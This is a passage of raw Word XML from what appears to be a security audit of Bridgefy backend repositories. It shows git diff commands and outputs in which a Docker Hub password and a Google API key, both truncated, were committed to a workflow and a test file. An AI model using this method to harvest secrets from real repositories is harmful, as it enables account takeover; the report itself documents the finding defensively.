          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>repository):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="720" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>a/.github/workflows/createECSImage.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b/.github/workflows/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>createECSImage.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Login to Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Hub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>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color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uses:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker/login-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>action@v2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>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color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15750144">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1811498</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>20853</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1274445" cy="133985"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="62" name="Group 62"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvPr id="62" name="Group 62"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1274445" cy="133985"/>
                          <a:chExt cx="1274445" cy="133985"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="63" name="Graphic 63"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1274445" cy="133985"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1274445" h="133985">
                                <a:moveTo>
                                  <a:pt x="1274159" y="133833"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133833"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1274159" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1274159" y="133833"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="64" name="Textbox 64"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1274445" cy="133985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p>
                              <w:pPr>
                                <w:spacing w:line="210" w:lineRule="exact" w:before="0"/>
                                <w:ind w:left="27" w:right="-15" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas"/>
                                  <w:b/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="333333"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>username: </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="333333"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>"tri[...]"</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group style="position:absolute;margin-left:142.637695pt;margin-top:1.641994pt;width:100.35pt;height:10.55pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15750144" id="docshapegroup48" coordorigin="2853,33" coordsize="2007,211">
                <v:rect style="position:absolute;left:2852;top:32;width:2007;height:211" id="docshape49" filled="true" fillcolor="#ffff00" stroked="false">
                  <v:fill type="solid"/>
                </v:rect>
                <v:shape style="position:absolute;left:2852;top:32;width:2007;height:211" type="#_x0000_t202" id="docshape50" filled="false" stroked="false">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:line="210" w:lineRule="exact" w:before="0"/>
                          <w:ind w:left="27" w:right="-15" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas"/>
                            <w:b/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas"/>
                            <w:b/>
                            <w:color w:val="333333"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>username: </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas"/>
                            <w:b/>
                            <w:color w:val="333333"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>"tri[...]"</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                  <w10:wrap type="none"/>
                </v:shape>
                <w10:wrap type="none"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> "dck[...]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$ git diff 2a1288~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2a1288</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>a/src/test/bootstrap.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b/src/test/bootstrap.spec.ts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(global as { fbRestUrl: string }).fbRestUrl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://identitytoolkit.googleapis.com/v1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>accounts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>signInWithPassword?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>key=AIz[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>repository):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="720" w:right="6721" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>c655f6~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>c655f6 git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b527e8~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b527e8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fe3737~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fe3737 git </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>623c8a~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>623c8a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="25"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>repository):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
